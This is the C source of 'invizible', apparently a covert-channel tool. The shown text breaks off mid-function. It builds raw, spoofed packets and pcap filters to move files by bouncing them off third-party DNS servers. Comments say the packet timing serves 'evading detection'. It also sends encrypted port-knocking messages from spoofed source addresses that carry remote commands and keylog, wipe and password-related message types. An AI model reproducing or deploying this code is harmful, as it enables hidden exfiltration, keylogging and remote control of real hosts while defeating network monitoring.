/**
 * @file invizible.c
 * @project invizible
 * @author Wesley Kenzie (wkenzie@gmail.com PGP 4c945266)
 * @created April 20, 2011
 * @modified June 18, 2011
 * @version 0.116
 * @copyright 2011. Arthur (Wesley) Kenzie. All Rights Reserved.
 * @license 3-clause BSD License. See accompanying LICENSE file.
 */

#include "common.h"
#include "parms.h"
#include "hpingwrap.h"
#include "mypcap.h"
#include "pkcommon.h"
#include "pkserver.h"
#include "pkclient.h"
#include "pcap/pcap-int.h"

//
// get next host to do dns lookup on
//
char *
get_lookuphost(const int c, char ext[(int)MAX_HOSTNAME_EXT_LEN]) {
    int thisc = c;
    int icoms, iorgs, inets, iothers;
    while (TRUE) {
        icoms = sizeof(hostcoms)/sizeof(char *);
        if (thisc < icoms) {
            memset(ext, 0, (int)MAX_HOSTNAME_EXT_LEN);
            strcpy(ext, ".com");
            return hostcoms[thisc];
        }
        iorgs = sizeof(hostorgs)/sizeof(char *);
        if (thisc < (icoms + iorgs)) {
            memset(ext, 0, (int)MAX_HOSTNAME_EXT_LEN);
            strcpy(ext, ".org");
            return hostorgs[thisc-icoms];
        }
        inets = sizeof(hostnets)/sizeof(char *);
        if (thisc < (icoms + iorgs + inets)) {
            memset(ext, 0, (int)MAX_HOSTNAME_EXT_LEN);
            strcpy(ext, ".net");
            return hostnets[thisc-icoms-iorgs];
        }
        iothers = sizeof(hostothers)/sizeof(char *);
        if (thisc < (icoms + iorgs + inets + iothers)) {
            memset(ext, 0, (int)MAX_HOSTNAME_EXT_LEN);
            return hostothers[thisc-icoms-iorgs-inets];
        }
        thisc -= (icoms+iorgs+inets+iothers);
    }
}
//
//
//
char
get_lookupchar(char thishost[NI_MAXHOST], int currentseed) {
    char test[NI_MAXHOST];
    char hextension[16];
    int i;
    for (i=get_miniseed(); i < get_maxiseed(); i++) {
        memset(test, 0, (int)NI_MAXHOST);
        strncpy(test, get_lookuphost(i + currentseed, hextension), (int)NI_MAXHOST);
        if (strlen(hextension) > 0) {
            strcat(test, hextension);
        }
        if (strncmp(test, thishost, strlen(test)) == 0) {
            return (char)i; // - get_iseed() ?
        }
    }
    return -1;
}
#ifdef LIBEV
//
// (client) callback function for SIGINT
//
void
sigint_cb(struct ev_loop *loop, struct ev_signal *w, int revents) {
    logit(_LOG_INFO, "interrupt SIGINT signal caught", 0);
    ev_unloop(loop, EVUNLOOP_ALL);
    sig_interrupted = 1;
}
#endif
//
// set_socket_recv_buff_size() function
// http://www.winpcap.org/pipermail/winpcap-users/2006-October/001521.html
// this is an attempt to increase the receive buffer size for sockets
// so that libpcap will not drop so many packets in heavy traffic situations
//
void
set_socket_recv_buff_size() {
    int ires;
    char logmsg[512];
    //
    snprintf(cmd_buf, CMD_BUFSIZE-1, "sysctl -w net.core.rmem_max="INVIZ_SOCKET_RECV_BUFFER_SIZE" 2>&1");
    ires = run_extcmd_inviz(0, cmd_buf, cmd_out, STANDARD_CMD_OUT_BUFSIZE, 0);
    if(!EXTCMD_IS_SUCCESS(ires)) {
        if (get_verbose()) {
            sprintf(logmsg, "unable to exec %s [%i]", cmd_buf, ires);
            logit(_LOG_ERROR, logmsg, 0);
        }
        return;
    }
    cmd_out[STANDARD_CMD_OUT_BUFSIZE] = '\0';
    snprintf(cmd_buf, CMD_BUFSIZE-1, "sysctl -w net.core.rmem_default="INVIZ_SOCKET_RECV_BUFFER_SIZE" 2>&1");
    ires = run_extcmd_inviz(0, cmd_buf, cmd_out, STANDARD_CMD_OUT_BUFSIZE, 0);
    if(!EXTCMD_IS_SUCCESS(ires)) {
        if (get_verbose()) {
            sprintf(logmsg, "unable to exec %s [%i]", cmd_buf, ires);
            logit(_LOG_ERROR, logmsg, 0);
        }
        return;
    }
    cmd_out[STANDARD_CMD_OUT_BUFSIZE] = '\0';
    //
    return;
}
//
// this is called from run() function to prepare sending (as a client)
// or to get ready to receive (as server)
//
void
doinvizible(unsigned int source_addr, unsigned int dest_addr, const char *filename,
        int isserver, int spoof_ipid, int spoof_tcpseq, int spoof_ack) {
    struct send_tcp send_tcp_packet;
    struct send_udp send_udp_packet;
    struct pseudo_header_tcp pseudo_header_tcp;
    struct pseudo_header_udp pseudo_header_udp;
    //struct recv_tcp recv_tcp_packet;
    char ch;
    char ch_hex[5];
    char recv_ch_hex[5];
    if (get_sockraw() > 0) {
        close(get_sockraw());
        set_sockraw(0);
    }
    int iresult, c, hdr_size, lhlen;
    int isclient = (!isserver);
    int isbidirectional = FALSE;
    int isportknocking = (get_usepk());
    int isfiletransfer = (!isportknocking);
    if (isfiletransfer) {
        isbidirectional = (get_iconfirminterval() > 0);
        set_packetdestport( (uint)INVIZ_DNS_PORT );
    } else if (isportknocking) {
        isbidirectional = ( ((get_pktype() == INVIZ_PKTYPE_INOTIFY) && get_inotifyecho()) ||
                (get_pktype() == INVIZ_PKTYPE_TRANSFER) ||
                (isserver && get_pkbeacon()) );
        if (get_pkportrandom() && !get_pkport() && get_pkportfirst() && get_pkportlast()) {
            //
            // using random destination ports
            // and needs to be randomized here
            // because get_pkport() is 0
            //
            set_pkport((rand() % (get_pkportlast() - get_pkportfirst())) + get_pkportfirst());
        }
        set_packetdestport( (uint)get_pkport() );
    }
    // dest_port is outgoing from client
    // dest_port is incoming to server
    set_packetsrcport( (uint)get_srcport() );
    if(get_packetsrcport() == 0) {
        set_packetsrcport(((rand() % ((int)MAX_UNPRIVILEGED_PORT - (int)MAX_PRIVILEGED_PORT)) + (int)MAX_PRIVILEGED_PORT));
    }
    struct sockaddr_in sin;
    char logmsg[512];
    char setflags[1024] = {'\0'};
    struct timeval tprun;
    double time_start, time_snapshot, time_confirmstart, time_current;
    int confirmationexpired;
    char * pcap_dev;
    pcap_t * pcap_dev_struct;
    bpf_u_int32 maskp;
    bpf_u_int32 netp;
    struct bpf_program fp;
    char packetfilter[MAX_PACKETFILTER_LEN];
    u_char * args = NULL;
    char local_addr_dot_notation[MAX_IP4_LEN];
    char local_mask_dot_notation[MAX_IP4_LEN];
    //
    char fko_buffer[MAX_LINE_LEN];
    //
    // get program start time
    //
    gettimeofday(&tprun, NULL);
    time_start = tprun.tv_sec+(tprun.tv_usec/1000000.0);
    //
    /* Initialize RNG for future use */
    //
    srand( (getpid()) + time(NULL) ); //seed random number
    //
    // sleep settings are only applicable to client
    // in order to not send packets too quickly
    // and thus assist in evading detection
    //
    int sleep_seconds;
    //
    // xref invizible vars/parameters to hping
    //
    opt_rawipmode = FALSE; // per hping
    opt_icmpmode = get_useicmp(); // per hping
    opt_udpmode = get_useudp(); // per hping
    //int opt_tcpmode = (!opt_rawipmode && !opt_icmpmode && !opt_udpmode);
    opt_listenmode = isserver;
    opt_scanmode = FALSE;
    opt_flood = FALSE;
    opt_rand_dest = FALSE;
    opt_rand_source = FALSE;
    opt_debug = FALSE;
    opt_mf = FALSE; // more fragments flag
    opt_df = TRUE; // do not fragment flag
    opt_force_incdport = FALSE; // increment dest port?
    opt_keepstill = FALSE; // keep same src port ?
    opt_fragment = FALSE;
    memset(ip_opt, 0, sizeof(ip_opt));
    opt_safe = FALSE; // see hping/sendip.c and src_id
    opt_lsrr = FALSE; // no loose source routing option
    opt_ssrr = FALSE; // no strict source routing option
    opt_rroute = FALSE; // no record route option
    src_id = -1; // random (if not random then src_id = 1 and opt_safe = TRUE)
    opt_datafromfile = FALSE; // only applicable to client
    opt_datafrompayload = TRUE; // only applicable to client (or server sending confirmations)
    //
    // targetname is from perspective of originating client or server
    // spoofaddr is also from perspective of originating client or server
    //
    memset(targetname, 0, sizeof(targetname));
    memset(spoofaddr, 0, sizeof(spoofaddr));
    char sourcename[NI_MAXHOST];
    memset(sourcename, 0, sizeof(sourcename));
    char spoofed_or_not[16];
    memset(spoofed_or_not, 0, sizeof(spoofed_or_not));
    //
    if (isclient) {
        if (isportknocking) {
            //
            // sending port knocking (spa) packet from client to server/target
            //
            strlcpy(targetname, get_destinationip(), (int)NI_MAXHOST);
            if (get_spoofip() && (strlen(get_spoofip()) > 0)) {
                strlcpy(spoofaddr, get_spoofip(), (int)NI_MAXHOST);
            }
        } else {
            //
            // file transfer from client to server
            // spoofaddr is destination ip for file transfer
            // because packets will be sent out from client
            // with this spoofed "source" so they will bounce off
            // the dns server to the spoofaddr "destination"
            //
            strlcpy(spoofaddr, get_destinationip(), (int)NI_MAXHOST);
            //
            // targetname is source ip for file transfer
            // because packets will be sent to this target/destination
            // which is the source ip from the ultimate destination's (server's) perspective
            //
            strlcpy(targetname, get_sourceip(), (int)NI_MAXHOST);
        }
    } else if (isbidirectional && isfiletransfer) {
        //
        // is server
        // must send confirmation packets back to this client/targetname
        // and make them appear to come from spoofaddr/dns server
        //
        strlcpy(spoofaddr, get_sourceip(), (int)NI_MAXHOST);
        strlcpy(targetname, get_destinationip(), (int)NI_MAXHOST);
    } else if (isportknocking) {
        //
        // is server here too
        // server expects incoming port knocking packet to come
        // from this address
        // no spoofing packets coming out of server for port knocking
        //
        if (get_destinationip() && (strlen(get_destinationip()) > 0)) {
            strlcpy(targetname, get_destinationip(), (int)NI_MAXHOST);
        }
    }
    dst_port = get_packetdestport(); // this is src_port if opt_listenmode/server
    //
    // remote/server ip4
    // or originating client ip4 if server and sending back confirmation packets
    //
    if (strlen(targetname) > 0) {
        iresult = resolve_addr((struct sockaddr*)&remote, targetname);
        if (iresult != 0) {
            sprintf(logmsg, "unable to resolve %s address [%s]",
                    targetname,
                    strerror(errno));
            logit(_LOG_ERROR, logmsg, 0);
            return;
        }
    } else {
        //
        // get something into remote ...
        //
        char pseudo_targetname[] = INVIZ_DEFAULT_DNS_IP4;
        iresult = resolve_addr((struct sockaddr*)&remote, pseudo_targetname);
        if (iresult != 0) {
            sprintf(logmsg, "unable to resolve %s address [%s]",
                    pseudo_targetname,
                    strerror(errno));
            logit(_LOG_ERROR, logmsg, 0);
            //return;
        }
    }
    char validate_char;
    char validate_char_hex[5];
    char trigger_hostname[NI_MAXHOST];
    char seed_hostname[NI_MAXHOST];
    char hostname_extension[(int)MAX_HOSTNAME_EXT_LEN];
    memset(seed_hostname, 0, (int)NI_MAXHOST);
    strncpy(seed_hostname, get_lookuphost(get_iseed(), hostname_extension), (int)NI_MAXHOST);
    set_triggerhostname(trigger_hostname, seed_hostname, hostname_extension);
    char incoming_packet_desc[32];
    char sending_packet_desc[32];
    if (isserver) {
        strcpy(incoming_packet_desc, "incoming");
        if (isfiletransfer) {
            strcpy(sending_packet_desc, "sending confirmation");
        } else {
            strcpy(sending_packet_desc, "sending response");
        }
    } else {
        if (isfiletransfer) {
            strcpy(incoming_packet_desc, "incoming confirmation");
        } else {
            strcpy(incoming_packet_desc, "incoming result");
        }
        strcpy(sending_packet_desc, "sending");
    }

    if ( isserver || (isclient && isbidirectional) ) {
        //
        // will be listening for received packets
        // so setup pcap to do that
        // or if doing port knocking from client and is only using private local subnet
        //
        set_socket_recv_buff_size();
        //
        //pcap_dev = pcap_lookupdev(errbuf);
        //
        pcap_dev = malloc(INVIZ_MAX_PCAP_DEVICE_LEN+1);
        if (pcap_dev == NULL) {
            sprintf(logmsg, "unable to malloc pcap_dev [%s]", strerror(errno));
            logit(_LOG_ERROR, logmsg, 0);
            return;
        }
        memset(pcap_dev, 0x0, sizeof(pcap_dev));
        pcap_dev = pcap_lookupdevspec((char *)get_ifname());
        if ( (pcap_dev != NULL) &&
                (strlen(pcap_dev) > 0) &&
                (strncmp(get_ifname(), INVIZ_ANY_DESC, strlen(get_ifname())) == 0) ) {
            //
            // found available interface
            // default was specified as "any"
            // mark this as the interface to use
            //
            set_ifname(pcap_dev, strlen(pcap_dev));
            if (get_verbose()) {
                sprintf(logmsg, "specified interface was %s - will use %s",
                    INVIZ_ANY_DESC,
                    get_ifname());
                logit(_LOG_INFO, logmsg, 0);
            }
        }
        if (((pcap_dev == NULL) ||
                (strlen(pcap_dev) == 0) ||
                (strlen(pcap_dev) != strlen(get_ifname())) ||
                (strncmp(pcap_dev, get_ifname(), strlen(pcap_dev)) != 0) )) {
            sprintf(logmsg, "unable to find interface %s", (char *)get_ifname());
            logit(_LOG_ERROR, logmsg, 0);
            sprintf(logmsg, "try again with %s parameter", (char *)get_ifnameparm());
            logit(_LOG_INFO, logmsg, 0);
            if (pcap_dev) {
                free(pcap_dev);
            }
            return;
        } else {
            set_pcapdevice(pcap_dev, strlen(pcap_dev));
        }
        //
        // get IP address and subnet mask of the device
        //
    	iresult = pcap_lookupnet(pcap_dev, &netp, &maskp, errbuf);
        if (iresult == -1) {
            sprintf(logmsg, "unable to pcap_lookupnet() [%s]", errbuf);
            logit(_LOG_WARNING, logmsg, 0);
            if (pcap_dev) {
                free(pcap_dev);
            }
            return;
        }
        struct in_addr local_addr;
        local_addr.s_addr = netp;
        strcpy(local_addr_dot_notation, inet_ntoa(local_addr));
        if (local_addr_dot_notation == NULL) {
            sprintf(logmsg, "unable to determine interface %s address",
                    (char *)get_ifname());
            logit(_LOG_ERROR, logmsg, 0);
            if (pcap_dev) {
                free(pcap_dev);
            }
            return;
        }
        struct in_addr local_mask;
        local_mask.s_addr = maskp;
        strcpy(local_mask_dot_notation, inet_ntoa(local_mask));
        if (local_mask_dot_notation == NULL) {
            sprintf(logmsg, "unable to determine interface %s address mask",
                    (char *)get_ifname());
            logit(_LOG_ERROR, logmsg, 0);
            if (pcap_dev) {
                free(pcap_dev);
            }
            return;
        }
        sprintf(logmsg, "listening for %s packets on interface %s address %s netmask %s",
                incoming_packet_desc,
                (char *)get_ifname(),
                local_addr_dot_notation,
                local_mask_dot_notation);
        logit(_LOG_INFO, logmsg, 0);
        //
        // open the device for packet capture, with following syntax:
	/*
       	pcap_t *pcap_open_live (char *device,
				int snaplen, -	maximum size of packets to capture in bytes
				int prmisc,  -  put the card in promiscuous mode
				int to_ms,   -  Timeout waiting for packets
       				char *ebuf)  -  Error string is returned in this variable
	*/
        //
        pcap_dev_struct = pcap_open_live(pcap_dev,
            get_pcapbufferlen(),
            get_promiscuous(),
            get_pcaptimeout(),
            errbuf);
        if(pcap_dev_struct == NULL) {
            sprintf(logmsg, "unable to pcap_open_live() [%s]", errbuf);
            logit(_LOG_ERROR, logmsg, 0);
            if (pcap_dev) {
                free(pcap_dev);
            }
            return;
        } else {
            set_pcapstruct((pcap_t *)pcap_dev_struct);
        }
        if (pcap_dev) {
            free(pcap_dev);
            pcap_dev = NULL;
        }
        //
        /* We are only interested on seeing packets coming into the interface.
        */
        //
        if (pcap_setdirection(get_pcapstruct(), PCAP_D_IN) < 0) {
            sprintf(logmsg, "unable to pcap_open_setdirection() [%s]", errbuf);
            logit(_LOG_WARNING, logmsg, 0);
        }
        //
        // Compile the packet capture filter expression
        //
        if (isfiletransfer) {
            if (!isbidirectional) {
                // applies only to server receiving packets
                // client will not use pcap in this case
                sprintf(packetfilter, "%s and (src port %i) and (src host %s)",
                        (char *)get_protocoldesc(),
                        get_packetdestport(),
                        (char *)get_dnsip());
            } else if (isclient) {
                // confirmation packets arriving at client
                sprintf(packetfilter, "%s and (src port %i) and (src host %s) and !(dst host %s)",
                        (char *)get_protocoldesc(),
                        get_packetdestport(),
                        (char *)get_dnsip(),
                        (char *)get_serverip());
            } else {
                // for server, receiving packets from client
                // make sure outgoing spoofed confirmation packets from server to client are ignored
                sprintf(packetfilter, "%s and (src port %i) and (src host %s) and !(dst host %s)",
                        (char *)get_protocoldesc(),
                        get_packetdestport(),
                        (char *)get_dnsip4(),
                        (char *)get_clientip4());
            }
        } else if (isportknocking) {
            if (isserver) {
                if (strcmp(get_pkallowip(), INVIZ_ANY_DESC) == 0) {
                    if (get_pkportrandom() && get_pkportfirst() && get_pkportlast()) {
                        sprintf(packetfilter, "%s and (dst portrange %i-%i)",
                                (char *)get_protocoldesc(),
                                get_pkportfirst(),
                                get_pkportlast());
                    } else {
                        sprintf(packetfilter, "%s and (dst port %i)",
                                (char *)get_protocoldesc(),
                                get_packetdestport());
                    }
                } else {
                    if (get_pkportrandom() && get_pkportfirst() && get_pkportlast()) {
                        sprintf(packetfilter, "%s and (dst portrange %i-%i) and (src host %s)",
                                (char *)get_protocoldesc(),
                                get_pkportfirst(),
                                get_pkportlast(),
                                (char *)get_pkallowip());
                    } else {
                        sprintf(packetfilter, "%s and (dst port %i) and (src host %s)",
                                (char *)get_protocoldesc(),
                                get_packetdestport(),
                                (char *)get_pkallowip());
                    }
                }
            } else {
                // is client
                if (isbidirectional) {
                    if (get_usepk() && (get_pktype() == INVIZ_PKTYPE_TRANSFER)) {
                        sprintf(packetfilter, "%s and (dst port %i) and (src host %s)",
                            (char *)get_protocoldesc(),
                            get_pktransferdestport(),
                            (char *)get_destinationip());
                    } else {
                        sprintf(packetfilter, "%s and (src port %i) and (src host %s)",
                            (char *)get_protocoldesc(),
                            get_packetdestport(),
                            (char *)get_destinationip());
                    }
                }
            }
        }
        //
        set_packetfilter(packetfilter, strlen(packetfilter));
        if (pcap_compile(get_pcapstruct(), &fp, (char *)get_packetfilter(), 0, netp) == -1) {
            sprintf(logmsg, "unable to pcap_compile filter (%s) [%s]",
                    (char *)packetfilter,
                    strerror(errno));
            logit(_LOG_ERROR, logmsg, 0);
            return;
        }
        //
        // now load the filter into the capture device
        //
        if (pcap_setfilter(get_pcapstruct(), &fp) == -1) {
            sprintf(logmsg, "unable to pcap_setfilter (%s) [%s]",
                    (char *)packetfilter,
                    strerror(errno));
            logit(_LOG_ERROR, logmsg, 0);
            return;
        }
        if (get_verbose()) {
            sprintf(logmsg, "listening pcap packet filter: %s",
                    (char *)get_packetfilter());
            logit(_LOG_INFO, logmsg, 0);
        }
        pcap_freecode(&fp);
        //
        /* Determine and set the data link encapsulation offset.
        */
        switch(pcap_datalink(get_pcapstruct())) {
            case DLT_EN10MB:
                set_datalinkoffset(14);
                break;
#if defined(__linux__)
            case DLT_LINUX_SLL:
                set_datalinkoffset(16);
                break;
#endif
            case DLT_NULL:
                set_datalinkoffset(4);
                break;
            default:
                set_datalinkoffset(0);
                break;
        }
    }
    //
    /* get interface name and address */
    // this sets value in "ifname" and in "ifstraddr" and in "h_if_mtu"
    //
    if (strlen(ifname)==0) {
        if (get_if_name() == -1) {
            sprintf(logmsg, "no interface/device found for %s packets [%s]",
                sending_packet_desc,
                strerror(errno));
            logit(_LOG_ERROR, logmsg, 0);
            return;
        } else {
            set_ifnameip(ifstraddr, strlen(ifstraddr));
            if (get_verbose()) {
                sprintf(logmsg, "%s IP address discovered for %s interface",
                        get_ifnameip(),
                        ifname);
                logit(_LOG_INFO, logmsg, 0);
            }
        }
    }
    //
    if ( isclient || (isserver && isbidirectional)) {
        //
        //
        //
        if (isserver && isportknocking && (strlen(targetname)) > 0) {
            //
            // if server and responding to port knocking packets
            // and sending back file transfer to client
            // then targetname is not yet known
            // since it is advertised in port knocking packet
            // so outgoing interface will be determined later
            //
            if (get_verbose()) {
                sprintf(logmsg, "destination of response packets not yet known");
                logit(_LOG_INFO, logmsg, 0);
            }
        } else {
            //
            // set interface to that found in get_if_name()
            // should default interface be "auto" instead of "eth0" ?
            // what if specified --if= does not match get_if_name() ?
            //
            if ( (strlen(get_ifname()) != strlen(ifname)) ||
                    (strncmp(get_ifname(), ifname, strlen(get_ifname())) != 0) ) {
                if (strncmp(ifname, "lo", 2) != 0) {
                    set_ifname(ifname, strlen(ifname));
                }
            }
            if (get_verbose()) {
                sprintf(logmsg, "will use interface %s for %s packets (%s) MTU=%d",
                        ifname,
                        sending_packet_desc,
                        get_ifnameip(),
                        h_if_mtu);
                logit(_LOG_INFO, logmsg, 0);
            }
            //
            /* Now open the raw socket for sending */
            //
            if (get_useraw() && (get_sockraw() == 0)) {
                set_sockraw(socket(AF_INET, SOCK_RAW, IPPROTO_RAW));
                if(get_sockraw() < 0) {
                    sprintf(logmsg, "raw socket cannot be opened for %s packets [%s]",
                            sending_packet_desc,
                            strerror(errno));
                    logit(_LOG_ERROR, logmsg, 0);
                    return;
                }
                //
                /* set SO_BROADCAST option */
                //
                socket_broadcast(get_sockraw());
                //
                /* set SO_IPHDRINCL option */
                //
                socket_iphdrincl(get_sockraw());
                //
#ifndef HPING_WITHOUT_PCAP
                if (open_pcap() == -1) {
                    // why are we doing this? (to enable get_linkhdr_size() following)
                    sprintf(logmsg, "unable to open_pcap [%s]", strerror(errno));
                    logit(_LOG_ERROR, logmsg, 0);
                    return;
                }
#endif
                //
                /* get physical layer header size */
                //
                if ( get_linkhdr_size(ifname) == -1 ) {
                    // is this used by hping later on?
                    // is this dependent on open_pcap() above? (yes)
                    sprintf(logmsg, "unknown physical layer header size [%s]",
                            strerror(errno));
                    logit(_LOG_ERROR, logmsg, 0);
                    return;
                }
            }
            //
            // local/spoofed ip:
            // for file transfer the spoofed ip address is the destination server ip address
            // bounced off the dns server;
            // for port knocking the spoofed ip address is the fake source ip address
            // so the source remains hidden
            //
            if (strlen(spoofaddr) == 0) {
                //
                // set "local" address structure to ifstraddr if spoofed ip not specified
                //
                iresult = resolve_addr((struct sockaddr*)&local, get_ifnameip());
                strncpy(sourcename, get_ifnameip(), strlen(get_ifnameip()));
            } else {
                iresult = resolve_addr((struct sockaddr*)&local, spoofaddr);
                strncpy(sourcename, spoofaddr, strlen(spoofaddr));
            }
            if (iresult != 0) {
                sprintf(logmsg, "unable to resolve %s address [%s]",
                        spoofaddr,
                        strerror(errno));
                logit(_LOG_ERROR, logmsg, 0);
                return;
            }
            //local.sin_port = source_port;
        }
    }
    //
    /**********************/
    /* Client code        */
    /**********************/
    //
    if(isclient && isportknocking) {
        //sprintf(logmsg, "port knocking packet to be sent to server %s port %d", get_serverip(), get_pkport());
        //logit(_LOG_INFO, logmsg, 0);
        if (!get_externalip4() || strlen(get_externalip4()) <= 0) {
            //
            // if external IP address not known
            // set default IP address
            //
            set_externalip4("0.0.0.0", 7);
        }
        //
        /* Set client timeout */
        //
        if (get_pktimeout() >= 0) {
            iresult = fko_set_spa_client_timeout(get_pkcontext(), get_pktimeout());
            if(iresult != FKO_SUCCESS) {
                sprintf(logmsg, "unable to set port knocking timeout to %i [%s]",
                        get_pktimeout(),
                        fko_errstr(iresult));
                logit(_LOG_ERROR, logmsg, 0);
                return;
            }
        }
        //
        /* Set the SPA packet message type */
        //
        short message_type;
        if (get_pkservercommand() && (strlen(get_pkservercommand()) > 0)) {
            // server command to be executed
            message_type = FKO_COMMAND_MSG;
            snprintf(fko_buffer, MAX_LINE_LEN, "%s%s%s",
                (char *)get_externalip4(),
                ",",
                (char *)get_pkservercommand());
        } else if (get_nataccessrequest() && (strlen(get_nataccessrequest()) > 0)) {
            // nat access request
            if (get_natlocal() == TRUE) {
                if (get_pktimeout() >= 0) {
                    message_type = FKO_CLIENT_TIMEOUT_LOCAL_NAT_ACCESS_MSG;
                } else {
                    message_type = FKO_LOCAL_NAT_ACCESS_MSG;
                }
            } else {
                // nat not local
                if (get_pktimeout() >= 0) {
                    message_type = FKO_CLIENT_TIMEOUT_NAT_ACCESS_MSG;
                } else {
                    message_type = FKO_NAT_ACCESS_MSG;
                }
            }
        } else if (get_pktransfercommand() && (strlen(get_pktransfercommand()) > 0)) {
            message_type = FKO_TRANSFER_MSG;
            snprintf(fko_buffer, MAX_LINE_LEN, "%s%s%s",
                (char *)get_externalip4(),
                ",",
                (char *)get_pktransfercommand());
        } else if (get_pkinotifycommand() && (strlen(get_pkinotifycommand()) > 0)) {
            message_type = FKO_INOTIFY_MSG;
            snprintf(fko_buffer, MAX_LINE_LEN, "%s%s%s",
                (char *)get_externalip4(),
                ",",
                (char *)get_pkinotifycommand());
        } else if (get_pkbeaconcommand() && (strlen(get_pkbeaconcommand()) > 0)) {
            message_type = FKO_BEACON_MSG;
            snprintf(fko_buffer, MAX_LINE_LEN, "%s%s%s",
                (char *)get_externalip4(),
                ",",
                (char *)get_pkbeaconcommand());
        } else if (get_pkwipecommand() && (strlen(get_pkwipecommand()) > 0)) {
            message_type = FKO_WIPE_MSG;
            snprintf(fko_buffer, MAX_LINE_LEN, "%s%s%s",
                (char *)get_externalip4(),
                ",",
                (char *)get_pkwipecommand());
        } else if (get_pkpasscommand() && (strlen(get_pkpasscommand()) > 0)) {
            message_type = FKO_PASS_MSG;
            snprintf(fko_buffer, MAX_LINE_LEN, "%s%s%s",
                (char *)get_externalip4(),
                ",",
                (char *)get_pkpasscommand());
        } else if (get_pkkeylogcommand() && (strlen(get_pkkeylogcommand()) > 0)) {
            message_type = FKO_KEYLOG_MSG;
            snprintf(fko_buffer, MAX_LINE_LEN, "%s%s%s",
                (char *)get_externalip4(),
                ",",
                (char *)get_pkkeylogcommand());
        } else {
            // access request (open up firewall)
            if (get_pktimeout() >= 0) {
                message_type = FKO_CLIENT_TIMEOUT_ACCESS_MSG;
            } else {
                message_type = FKO_ACCESS_MSG;
            }
        }
        iresult = fko_set_spa_message_type(get_pkcontext(), message_type);
        if (iresult != FKO_SUCCESS) {
            sprintf(logmsg, "unable to set port knocking message type [%s]",
                    fko_errstr(iresult));
            logit(_LOG_ERROR, logmsg, 0);
            return;
        }
        //
        //
        //
        char spa_temp[PK_BUFFER_LEN];
        char * spa_packet;
        char spa_encryption_key[INVIZ_MAX_PASSWORD_LEN+1];
        memset(spa_encryption_key, 0, INVIZ_MAX_PASSWORD_LEN+1);
        memset(spa_temp, 0, sizeof(spa_temp));
        //
        if (get_spoofip() && (strlen(get_spoofip()) > 0)) {
            strcpy(spa_temp, (char *)get_spoofip());
            strcpy(spoofed_or_not, "spoofed ");
        } else if (get_pkprivatesubnet()) {
            strcpy(spa_temp, get_ifnameip());
            strcpy(spoofed_or_not, "");
        } else if (get_externalip() && strlen((char *)get_externalip()) > 0) {
            strcpy(spa_temp, (char *)get_externalip());
            strcpy(spoofed_or_not, "");
        } else {
            sprintf(logmsg, "unknown port knocking source ip - must specify either %s or %s",
                    (char *)get_spoofipparm(),
                    (char *)get_externalipparm());
            logit(_LOG_ERROR, logmsg, 0);
            return;
        }
        if (get_pktype() == INVIZ_PKTYPE_ACCESS) {
            strcat(spa_temp, ",");
            strcat(spa_temp, get_pkaccessrequest());
        } else if (get_pktype() == INVIZ_PKTYPE_COMMAND) {
            strcat(spa_temp, ",");
            strcat(spa_temp, (char *)get_pkservercommand());
        } else if (get_pktype() == INVIZ_PKTYPE_TRANSFER) {
            strcat(spa_temp, ",");
            strcat(spa_temp, (char *)get_pktransfercommand());
            iresult = decon_transfercommand((const char *)get_pktransfercommand());
            if (iresult != EXIT_SUCCESS) {
                sprintf(logmsg, "unrecognized port knocking file transfer format (%s)",
                        (char *)get_pktransfercommand());
                logit(_LOG_ERROR, logmsg, 0);
                return;
            }
        } else if (get_pktype() == INVIZ_PKTYPE_INOTIFY) {
            strcat(spa_temp, ",");
            strcat(spa_temp, (char *)get_pkinotifycommand());
            iresult = decon_inotifycommand((const char *)get_pkinotifycommand());
            if (iresult != EXIT_SUCCESS) {
                sprintf(logmsg, "unrecognized port knocking inotify format (%s)",
                        (char *)get_pkinotifycommand());
                logit(_LOG_ERROR, logmsg, 0);
                return;
            }
        } else if (get_pktype() == INVIZ_PKTYPE_BEACON) {
            strcat(spa_temp, ",");
            strcat(spa_temp, (char *)get_pkbeaconcommand());
            iresult = decon_beaconcommand((const char *)get_pkbeaconcommand());
            if (iresult != EXIT_SUCCESS) {
                sprintf(logmsg, "unrecognized port knocking beacon format (%s)",
                        (char *)get_pkbeaconcommand());
                logit(_LOG_ERROR, logmsg, 0);
                return;
            }
        } else if (get_pktype() == INVIZ_PKTYPE_WIPE) {
            strcat(spa_temp, ",");
            strcat(spa_temp, (char *)get_pkwipecommand());
            iresult = decon_wipecommand((const char *)get_pkwipecommand());
            if (iresult != EXIT_SUCCESS) {
                sprintf(logmsg, "unrecognized port knocking wipe format (%s)",
                        (char *)get_pkwipecommand());
                logit(_LOG_ERROR, logmsg, 0);
                return;
            }
        } else if (get_pktype() == INVIZ_PKTYPE_PASS) {
            strcat(spa_temp, ",");
            strcat(spa_temp, (char *)get_pkpasscommand());
            iresult = decon_passcommand((const char *)get_pkpasscommand());
            if (iresult != EXIT_SUCCESS) {
                sprintf(logmsg, "unrecognized port knocking password format (%s)",
                        (char *)get_pkpasscommand());
                logit(_LOG_ERROR, logmsg, 0);
                return;
            }
        } else {
            sprintf(logmsg, "unknown port knocking message type (%d)",
                    get_pktype());
            logit(_LOG_ERROR, logmsg, 0);
            return;
        }
        iresult = fko_set_spa_message(get_pkcontext(), spa_temp);
        if (iresult != FKO_SUCCESS) {
            sprintf(logmsg, "unable to set port knocking message (%s) [%s]",
                    spa_temp,
                    fko_errstr(iresult));
            logit(_LOG_ERROR, logmsg, 0);
            return;
        }
        if (get_pkpassword()) {
            strncpy(spa_encryption_key, (char *)get_pkpassword(), strlen(get_pkpassword()));
        } else {
            strncpy(spa_encryption_key, get_user_pw_inviz(CRYPT_OP_ENCRYPT), INVIZ_MAX_PASSWORD_LEN);
            set_pkpassword(spa_encryption_key, strlen(spa_encryption_key));
        }
        //
        iresult = fko_spa_data_final(get_pkcontext(), (char *)spa_encryption_key);
        if (iresult != FKO_SUCCESS) {
            sprintf(logmsg, "unable to finalize port knocking message %s [%s]",
                    spa_temp,
                    fko_errstr(iresult));
            logit(_LOG_ERROR, logmsg, 0);
            return;
        }
        if (get_pksavefilename() && (strlen((const char *)get_pksavefilename()) > 0)) {
            iresult = write_spa_packet_data_inviz(get_pkcontext());
            if (iresult != FKO_SUCCESS) {
                sprintf(logmsg, "unable to save message packet %s to filename %s [%s]",
                        spa_temp,
                        (char *)get_pksavefilename(),
                        fko_errstr(iresult));
                logit(_LOG_ERROR, logmsg, 0);
                return;
            }
            sprintf(logmsg, "message packet now saved to filename %s",
                    (char *)get_pksavefilename());
            logit(_LOG_INFO, logmsg, 0);
            // continue from here after writing packet to file for manual review
        }
